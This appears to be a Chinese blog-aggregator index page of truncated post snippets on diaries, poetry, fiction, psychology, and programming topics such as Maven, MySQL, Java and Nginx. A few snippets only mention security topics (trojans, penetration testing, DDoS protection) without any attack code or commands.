    导语:计算机木马(ComputerTrojan)是一种恶意软件,通过欺骗用户从而获取系统控制权限,给黑客打开系统后门的一种手段。虽然木马的存在给用户和系统带来严重的安全风险,但是了解它的工作原理与编写思路,对于我们提高防范意识、构建更健壮的网络安全体系具有重要意义。本篇博客将深入剖析计算机木马的详细编写思路,以及如何复杂化挑战,以期提高读者对计算机木马的认识和对抗能力。计算机木马的基本原理计算机木
  • 2021-11-18 安安303
    刘红雅中原焦点团队分享第135天筑基第4课社会心理学接上一课,心理现象。需要和动机所有的动机行为受需要的影响,现在的孩子很多方面不需要,是因为得到的太多需要使机体内部不平衡的状态,现在很多需要满足的过多,是“厌”,孩子要越用越有用,没有用到自己,自己没有价值感成就感,他就不需要开发自己的潜力。对自己和孩子的生活留白不断的学习成长,实现自己。所有有情绪的地方是触动了需求,需求没有被满足,当一个人知道
  • 古诗词欣赏 :杨万里的秋凉晚步 一日进步一点
    1、原文:秋凉晚步[宋]杨万里秋气堪悲未必然,轻寒正是可人天。绿池落尽红蕖却,荷叶犹开最小钱。2、译文:秋天真的是让人感觉悲凉的季节吗?未必是这样吧,轻微的寒冷,正是最让人感觉舒适的天气,碧绿的荷叶虽然快要落完了,但是粉红的荷花却还在盛开,新长出的荷叶就像最小的铜钱那么大。3、注释可人:合人意。红蕖(音同“渠”):荷花。却:开尽。最小钱:新出荷叶才象小铜钱那么大。4、赏析:向来诗人容易悲愁,秋风飒
  • 信息系统安全相关概念(下) YuanDaima2048 基础概念课程笔记安全
    文章总览:YuanDaiMa2048博客文章总览上篇指路:信息系统安全相关概念(上)信息系统安全相关概念[下]信息系统风险评估安全风险评估信息系统等级保护网络安全法等级保护等级保护工作流程环境安全信息系统风险评估安全风险评估对信息系统整体安全态势的感知和对重大安全事件的预警,实现“事前能预防,事中能控制,事后能处理”。安全风险组成的四要素:信息系统资产(Asset)信息系统脆弱性(Vulnerab
  • 少年冯菊芬(八) 一杯老酒
    七,愿做红鲤救灾民有一年夏天,本地大旱,就连营庄北边的鲁兰河,据说在1909年曾经因为发大水,导致鲁兰河两岸的连片村庄先后被洪水煙没,但是干旱的这一年,鲁兰河都干涸见底了,何况附近所有的小河。烈日之下,时常可见很多庶民百姓聚集在一起,烧香拜佛,试图祈祷感化上苍。说来奇怪,就在大埠街有一口古井特别神奇,即便是严重干旱的那一年,古井里的水位也没有大的变化,往往是一段时间,因为附近村民来往取水频繁,古井
  • 90天读书分享76——家为什么会伤人 韧2018
    图片发自App今天分享的书籍是《家为什么会伤人》,作者是武志红,著名的心理学家,畅销书作家。本书是讲述中国家庭的文化的一些缺陷造成的种种不良后果,我将分享书中家庭和婚姻中的误区和正确的做法。由于我们在家庭和婚姻中没有采取正确做法,走入了误区,会给婚姻和家庭带来巨大的伤害,而且这种伤害会可能会对子女造成影响,会不断延续下去,造成悲剧的反复发生。现在来看看婚姻中存在误区:第一个误区是不以夫妻关系为家庭
  • 【Death Note】网吧战神之7天爆肝渗透测试死亡笔记_sqlmap在默认情况下除了使用 char() 函数防止出现单引号 2401_84561374 程序员笔记
    网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化的资料的朋友,可以戳这里获取一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!特殊服务端口2181zookeeper服务未授权访问
  • 小时候的“年”(四) 春风拂林绿
    初一早起我们这儿叫“起五更(jing)”,大约是早晨五、六点钟左右,每家都不一样,但大约是这样一个时间。早晨吃饺子前也要放一支鞭,一般听到各家的鞭炮声,就能知道自己家里起的早还是晚了。关于吃饺子的习俗前面已经说过,在此就不加赘述了。吃完饺子后,就要开始拜年了。未出嫁的女孩子是无须去拜年的,一般都是一大家人,男人们一队,媳妇们一队,挨门挨户的去给自家的长辈们拜年。也就是一群人一起给长辈们磕头,过年磕
  • 剧本杀谁是凶手《红瞳消逝之时》凶手是谁剧透+真相答案复盘解析攻略 VX搜_奶茶剧本杀
    本文为谁是凶手《红瞳消逝之时》剧本杀测评+部分真相复盘,获取完整真相复盘只需两步:①、关注微信公众号【奶茶剧本杀】→②、回复谁是凶手《红瞳消逝之时》即可获取查看谁是凶手《红瞳消逝之时》剧本杀真相答案复盘+凶手剧透:以下是玩家评测+部分关键证据,凶手,时间线,复盘解析,推理逻辑--------------------------------------------------------------
  • 感恩日记 美玲_
    1,感恩小妹一大早,就发来了给妈妈洗浴后的照片。看到老妈平安健康,心中很是喜悦。祈愿老妈~在世的菩萨,健健康康平平安安,有妈在,家就在。让在外的儿女逢年过节有归心似箭的心情。2,感恩姚老师咖啡冥想研究生滴2期的义工团队,及时通报我参加学习事宜。让我这次学习不再,毫无准备,手忙脚乱。做好学习安排。3,感恩永红接受我的邀请,参与姚老师咖啡冥想研究生延续班,4,感恩丰盛10门的素娜,提议的语音好方法,更
  • 我的红本绿本 红海儿
    帮妈收拾屋子,洗被擦灰,翻箱倒柜。偶然,发现一处新大陆,我小学,中学的毕业证书。二十多年啦,我老妈还替我保管得挺好,没破相,没断篇。我不起眼的成绩单红色绿色还是那样鲜艳,好像我还没长大的模样。把本子翻开,我的照片映入眼帘,诶呦,这是谁家的小丫头啊?怎么这么招人稀罕呢?哈哈哈,我与本子对视,要笑掉下巴了。上面还有老师的钢笔字评语,被岁月褪淡了些许颜色,是姓李还有姓王,姓孙,姓闫……很多老师的名字还在
  • 《晕乎乎的米》 94min呀
    图片发自App今天我们渝川茶叶公司的孔总生日,忙了一下午亲手给我大爹现学现做了一束手工花,哈哈哈,挺有成就感的。很开心师傅和师兄能赶过来给他一起庆祝生日,特别有心还给带了礼物,感谢师傅师兄以及一木队的姐妹们一直以来对我们渝川公司的支持,感恩!今天高兴就喝了点酒,结果就喝晕了,这酒量真是没谁了。。。。。刚准备回家结果酒店推车上一瓶饮料掉下来扎扎实实地砸在了脚上,脚趾直接就乌了。让我心疼自己一秒。。。
  • 使用游戏盾就可以保证游戏不被攻击吗? 德迅云安全小李 游戏网络服务器安全网络安全
    游戏服务器不管是个人的还是企业的,被攻击都是,很常见的,在所难免的。特别是游戏新上线时,都要承受的住哪些外来压力,玩家突然猛增,被攻击等等。如果承受不住可能会直接宣布游戏倒闭。这里我们一起来说说怎么用游戏盾防御游戏服务器。首先我们要了解的一点是,什么是"游戏盾"游戏盾是针对游戏行业所推出的高度可定制的网络安全解决方案,除了能针对大型DDoS攻击(T级别)进行有效防御外,还能彻底解决游戏行业特有的T
  • 好奇 oulan
    试着把室温调成16度,试着把蚊账尽可能调成无缝隙模式,试着送排着队等着入夜来一波攻击模式的蚊子一直向西。昨天晚上的梦境就空幻而不可记。早晨醒来的时候鸟歌雀舞,这边山上一声,那边山上一声。走到屋子外面,连眼镜都因为热浪袭来而模糊不清。水面倒映着铁塔,小燕子在水面饱餐着飞虫。很好奇这不熟悉的世界,是什么让鱼儿秀着水花,是什么让鲜花爬满窗棱。一切都是好的开始,一会就去看山顶的微红。早安,世界。早安,未来
  • 【原创小说】总是东风错丨第十三章 郭勒的鱼
    郑重声明:文章系原创非首发,首发平台:头条号,ID:郭勒的鱼,文责自负。天刚亮,府外面一片嘈杂,门被拍的山响,这一夜苏府惊魂,人们吓得如同惊弓之鸟,听到这敲门声,连苏福都不敢贸然开门。趴在门缝往外一看,是大太太的哥哥舅姥爷虞南基来了,连忙着人开门,不但是虞南基来了,还领来一队三十多个全副武装的士兵。南竹看着哥哥。嘴扁了扁,蓦然鼻子一酸哭得泣不成声,虞南基很诧异。他这个妹妹他了解,外表的柔婉其实都是
  • 韩愈《题榴花》:倾听花落的声音 墙头草说
    无论有没有人欣赏,时节一到,花儿自然就会开放,这是自然的规律。但是多情的人们总以为花儿是为自己而开,于是在赏花之时,或惊叹于造化之功,或沉醉于迷人花香,或伤悼于满地落红……唐代诗人韩愈在观赏石榴花时,也生发出深沉的感慨,于是写下了《题榴花》一诗,原文如下:五月榴花照眼明,枝间时见子初成。可怜此地无车马,颠倒青苔落绛英。“五月榴花照眼明”,五月如火的石榴花映入眼帘格外鲜明。五月份,正是石榴花开得正盛
  • 来吧!唤醒你的生命力|红蛇波7脉轮清理疗愈与曼陀罗书写的完美结合 温温说玛雅
    图片来自溫梓年过半百的我自从实现了自由职业的生活以来,时间充裕节奏却更加紧密。几年身心灵的探索与对时间法则体系知识的学习,已经使我剥离了时间是金钱的价值观,时间不再是我用来赚钱的工具,而是我体验活着的艺术和载体,它变的具有可长可短的弹性,不再是固定一成不变的刻度。生命也不再是沉闷亢长令人喘不过气来的窒息,我感知着它每一刻都在生长的美妙,我迷恋这样的感觉。告别了那种时间永远都不够用、看似一刻都不能停
  • 2018-07-05安静 天高地阔心飞扬
    梁素红,焦点网络九期持续分享第131天(275)舞钢我已经能做到早上不在饭桌上就开始不停的对爱人说话了,真的很难得,也许爱人觉得自己的耳朵根清净了很多。中午从老家回来的路上,我又像以前,说了一路。都是些什么事情呢?也许早说过的,也许是猜测的,还有加上自己的评论,爱人一句话也不说,只有我一个人的独白,还像自言自语。现在我在审视自己的这个问题。我前一段时间怎么能做到,安静的不说话,我是怎么做到的?做到
  • [面试高频问题]关于多线程的单例模式 朱玥玥要每天学习 java单例模式开发语言
    单例模式什么是设计模式?设计模式可以看做为框架或者是围棋中的”棋谱”,红方当头炮,黑方马来跳.根据一些固定的套路下,能保证局势不会吃亏.在日常的程序设计中,往往有许多业务场景,根据这些场景,大佬们总结出了一些固定的套路.按照这个套路来实现代码,也不会吃亏.什么是单例模式,保证某类在程序中只有一个实例,而不会创建多份实例.单例模式具体的实现方式:可分为”懒汉模式”,”饿汉模式”.饿汉模式类加载的同时
  • 农药趣闻 71f8b6c2dfd3
    一场团战,我方队友一个个上。我说:“想挑战的人排好队,一个一个来。”夏候说:“乔,你咋抢我台词。”我说:“这不是导演欠我工资吗?气不过就。”夏候:“哈哈。”我方兰陵王不知是挂机还怎么,死了很多次。夏候:“看来对面给了很多钱给兰王。”我说:“哈哈,这当然。今天星光璀璨众星云集啊!吾等小辈倍感荣耀啊!”我又说:“兰陵王记得,世界欠你一个小金人。”哇,这帮弟兄们说的话,在下肚子都笑疼了。
  • 2022-02-05 倚剑白云天
    千秋岁床头历换,百岁过多半。山水秀,风雷变。载身天地老,卖赋文章贱。新句好,年来尽付红酥看。莫道春光晚,莫听林莺乱。抒啸傲,忘愁叹。劳劳冰雪调,坎坎烟霞愿。君不见,那人就在松江岸。
  • 20200105善忘 陆水手
    人是善忘的。晚上跟妈妈视频,说起最近村里有个中年人过逝,他家的天塌了,妈妈两晚没睡好。今年村里四队也有个中年人过逝了,他妈妈本来很胖的,现在很瘦,最近老来我家对门的门诊输液。后来,一不小心又聊到以往的苦难,妈妈又流了一把泪。我有的时候不惜命,及时行乐或得过且过,忘了自己肩上还有很多责任。不让家人担心,也是自己的责任。偶尔热血,却总是善忘。说起人生的苦,我跟妈妈说,既然这样我就不要二胎了,省的它以后
  • 2021-08-18 e48c6f9239a1
    忆往事——谨以此文感谢阿荀婶在禹州市方山镇方山寨南麓的半山腰,有一个叫东坡岭荀家门的小山村(不知何故,大思想家政治家荀子的后代,为什么要选择这么偏僻的地方居住),这也是阿荀婶娘家的地方。阿婶全名荀秋红,她的微信名是“阿荀”,我觉得这名有新意、有亲意,也能体现出对婶儿的敬意,就在文中称呼她阿荀婶吧!说是叫婶是长辈,并没有比我年纪大很多,只是她辈分长。阿荀婶还是很年轻漂亮的!1988年9月,21岁的阿
  • eclipse maven IXHONG eclipse
    eclipse中使用maven插件的时候,运行run as maven build的时候报错 -Dmaven.multiModuleProjectDirectory system propery is not set. Check $M2_HOME environment variable and mvn script match.   可以设一个环境变量M2_HOME指
  • timer cancel方法的一个小实例 alleni123 多线程timer
    package com.lj.timer; import java.util.Date; import java.util.Timer; import java.util.TimerTask; public class MyTimer extends TimerTask { private int a; private Timer timer; pub
  • MySQL数据库在Linux下的安装 ducklsl mysql
    1.建好一个专门放置MySQL的目录 /mysql/db数据库目录 /mysql/data数据库数据文件目录 2.配置用户,添加专门的MySQL管理用户 >groupadd mysql ----添加用户组 >useradd -g mysql mysql ----在mysql用户组中添加一个mysql用户 3.配置,生成并安装MySQL >cmake -D
  • spring------>>cvc-elt.1: Cannot find the declaration of element Array_06 springbean
    将-------- <?xml version="1.0" encoding="UTF-8"?> <beans xmlns="http://www.springframework.org/schema/beans"     xmlns:xsi="http://www.w3
  • maven发布第三方jar的一些问题 cugfy maven
    maven中发布 第三方jar到nexus仓库使用的是 deploy:deploy-file命令 有许多参数,具体可查看 http://maven.apache.org/plugins/maven-deploy-plugin/deploy-file-mojo.html 以下是一个例子: mvn  deploy:deploy-file -DgroupId=xpp3
  • MYSQL下载及安装 357029540 mysql
        好久没有去安装过MYSQL,今天自己在安装完MYSQL过后用navicat for mysql去厕测试链接的时候出现了10061的问题,因为的的MYSQL是最新版本为5.6.24,所以下载的文件夹里没有my.ini文件,所以在网上找了很多方法还是没有找到怎么解决问题,最后看到了一篇百度经验里有这个的介绍,按照其步骤也完成了安装,在这里给大家分享下这个链接的地址
  • ios TableView cell的布局 张亚雄 tableview
      cell.imageView.image = [UIImage imageNamed:[imageArray objectAtIndex:[indexPath row]]];           CGSize itemSize = CGSizeMake(60, 50);   &nbs
  • Java编码转义 adminjun java编码转义
    import java.io.UnsupportedEncodingException; /** * 转换字符串的编码 */ public class ChangeCharset { /** 7位ASCII字符,也叫作ISO646-US、Unicode字符集的基本拉丁块 */ public static final Strin
  • Tomcat 配置和spring aijuans spring
    简介 Tomcat启动时,先找系统变量CATALINA_BASE,如果没有,则找CATALINA_HOME。然后找这个变量所指的目录下的conf文件夹,从中读取配置文件。最重要的配置文件:server.xml 。要配置tomcat,基本上了解server.xml,context.xml和web.xml。 Server.xml --  tomcat主
  • Java打印当前目录下的所有子目录和文件 ayaoxinchao 递归File
    其实这个没啥技术含量,大湿们不要操笑哦,只是做一个简单的记录,简单用了一下递归算法。   import java.io.File; /** * @author Perlin * @date 2014-6-30 */ public class PrintDirectory { public static void printDirectory(File f
  • linux安装mysql出现libs报冲突解决 BigBird2012 linux
    linux安装mysql出现libs报冲突解决 安装mysql出现 file /usr/share/mysql/ukrainian/errmsg.sys from install of MySQL-server-5.5.33-1.linux2.6.i386 conflicts with file from package mysql-libs-5.1.61-4.el6.i686  
  • jedis连接池使用实例 bijian1013 redisjedis连接池jedis
    实例代码: package com.bijian.study; import java.util.ArrayList; import java.util.List; import redis.clients.jedis.Jedis; import redis.clients.jedis.JedisPool; import redis.clients.jedis.JedisPoo
  • 关于朋友 bingyingao 朋友兴趣爱好维持
      成为朋友的必要条件:    志相同,道不合,可以成为朋友。譬如马云、周星驰一个是商人,一个是影星,可谓道不同,但都很有梦想,都要在各自领域里做到最好,当他们遇到一起,互相欣赏,可以畅谈两个小时。     志不同,道相合,也可以成为朋友。譬如有时候看到两个一个成绩很好每次考试争做第一,一个成绩很差的同学是好朋友。他们志向不相同,但他
  • 【Spark七十九】Spark RDD API一 bit1129 spark
    aggregate package spark.examples.rddapi import org.apache.spark.{SparkConf, SparkContext} //测试RDD的aggregate方法 object AggregateTest { def main(args: Array[String]) { val conf = new Spar
  • ktap 0.1 released bookjovi kerneltracing
    Dear, I'm pleased to announce that ktap release v0.1, this is the first official release of ktap project, it is expected that this release is not fully functional or very stable and we welcome bu
  • 能保存Properties文件注释的Properties工具类 BrokenDreams properties
            今天遇到一个小需求:由于java.util.Properties读取属性文件时会忽略注释,当写回去的时候,注释都没了。恰好一个项目中的配置文件会在部署后被某个Java程序修改一下,但修改了之后注释全没了,可能会给以后的参数调整带来困难。所以要解决这个问题。     &nb
  • 读《研磨设计模式》-代码笔记-外观模式-Facade bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ /* * 百度百科的定义: * Facade(外观)模式为子系统中的各类(或结构与方法)提供一个简明一致的界面, * 隐藏子系统的复杂性,使子系统更加容易使用。他是为子系统中的一组接口所提供的一个一致的界面 * * 可简单地
  • After Effects教程收集 cherishLC After Effects
    1、中文入门 http://study.163.com/course/courseMain.htm?courseId=730009 2、videocopilot英文入门教程(中文字幕) http://www.youku.com/playlist_show/id_17893193.html 英文原址: http://www.videocopilot.net/basic/ 素
  • Linux Apache 安装过程 crabdave apache
    Linux Apache 安装过程   下载新版本: apr-1.4.2.tar.gz(下载网站:http://apr.apache.org/download.cgi) apr-util-1.3.9.tar.gz(下载网站:http://apr.apache.org/download.cgi) httpd-2.2.15.tar.gz(下载网站:http://httpd.apac
  • Shell学习 之 变量赋值和引用 daizj shell变量引用赋值
    本文转自:http://www.cnblogs.com/papam/articles/1548679.html Shell编程中,使用变量无需事先声明,同时变量名的命名须遵循如下规则: 首个字符必须为字母(a-z,A-Z) 中间不能有空格,可以使用下划线(_) 不能使用标点符号 不能使用bash里的关键字(可用help命令查看保留关键字) 需要给变量赋值时,可以这么写:
  • Java SE 第一讲(Java SE入门、JDK的下载与安装、第一个Java程序、Java程序的编译与执行) dcj3sjt126com javajdk
    Java SE 第一讲: Java SE:Java Standard Edition Java ME: Java Mobile Edition Java EE:Java Enterprise Edition Java是由Sun公司推出的(今年初被Oracle公司收购)。 收购价格:74亿美金 J2SE、J2ME、J2EE JDK:Java Development
  • YII给用户登录加上验证码 dcj3sjt126com yii
    1、在SiteController中添加如下代码: /** * Declares class-based actions. */ public function actions() { return array( // captcha action renders the CAPTCHA image displ
  • Lucene使用说明 dyy_gusi Lucenesearch分词器
    Lucene使用说明 1、lucene简介 1.1、什么是lucene     Lucene是一个全文搜索框架,而不是应用产品。因此它并不像baidu或者googleDesktop那种拿来就能用,它只是提供了一种工具让你能实现这些产品和功能。 1.2、lucene能做什么     要回答这个问题,先要了解lucene的本质。实际
  • 学习编程并不难,做到以下几点即可! gcq511120594 数据结构编程算法
    不论你是想自己设计游戏,还是开发iPhone或安卓手机上的应用,还是仅仅为了娱乐,学习编程语言都是一条必经之路。编程语言种类繁多,用途各 异,然而一旦掌握其中之一,其他的也就迎刃而解。作为初学者,你可能要先从Java或HTML开始学,一旦掌握了一门编程语言,你就发挥无穷的想象,开发 各种神奇的软件啦。 1、确定目标 学习编程语言既充满乐趣,又充满挑战。有些花费多年时间学习一门编程语言的大学生到
  • Java面试十问之三:Java与C++内存回收机制的差别 HNUlanwei javaC++finalize()堆栈内存回收
    大家知道, Java 除了那 8 种基本类型以外,其他都是对象类型(又称为引用类型)的数据。 JVM 会把程序创建的对象存放在堆空间中,那什么又是堆空间呢?其实,堆( Heap)是一个运行时的数据存储区,从它可以分配大小各异的空间。一般,运行时的数据存储区有堆( Heap)和堆栈( Stack),所以要先看它们里面可以分配哪些类型的对象实体,然后才知道如何均衡使用这两种存储区。一般来说,栈中存放的
  • 第二章 Nginx+Lua开发入门 jinnianshilongnian nginxlua
    Nginx入门 本文目的是学习Nginx+Lua开发,对于Nginx基本知识可以参考如下文章: nginx启动、关闭、重启 http://www.cnblogs.com/derekchen/archive/2011/02/17/1957209.html agentzh 的 Nginx 教程 http://openresty.org/download/agentzh-nginx-tutor
  • MongoDB windows安装 基本命令 liyonghui160com
      windows安装    安装目录:   D:\MongoDB\   新建目录   D:\MongoDB\data\db   4.启动进城:   cd D:\MongoDB\bin   mongod -dbpath D:\MongoDB\data\db   &n
  • Linux下通过源码编译安装程序 pda158 linux
    一、程序的组成部分   Linux下程序大都是由以下几部分组成:   二进制文件:也就是可以运行的程序文件   库文件:就是通常我们见到的lib目录下的文件   配置文件:这个不必多说,都知道   帮助文档:通常是我们在linux下用man命令查看的命令的文档    二、linux下程序的存放目录   linux程序的存放目录大致有三个地方:   /etc, /b
  • WEB开发编程的职业生涯4个阶段 shw3588 编程Web工作生活
    觉得自己什么都会 2007年从学校毕业,凭借自己原创的ASP毕业设计,以为自己很厉害似的,信心满满去东莞找工作,找面试成功率确实很高,只是工资不高,但依旧无法磨灭那过分的自信,那时候什么考勤系统、什么OA系统、什么ERP,什么都觉得有信心,这样的生涯大概持续了约一年。 根本不是自己想的那样 2008年开始接触很多工作相关的东西,发现太多东西自己根本不会,都需要去学,不管是asp还是js,
  • 遭遇jsonp同域下变作post请求的坑 vb2005xu jsonp同域post
    今天迁移一个站点时遇到一个坑爹问题,同一个jsonp接口在跨域时都能调用成功,但是在同域下调用虽然成功,但是数据却有问题. 此处贴出我的后端代码片段 $mi_id = htmlspecialchars(trim($_GET['mi_id '])); $mi_cv = htmlspecialchars(trim($_GET['mi_cv ']));  贴出我前端代码片段: $.aj
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他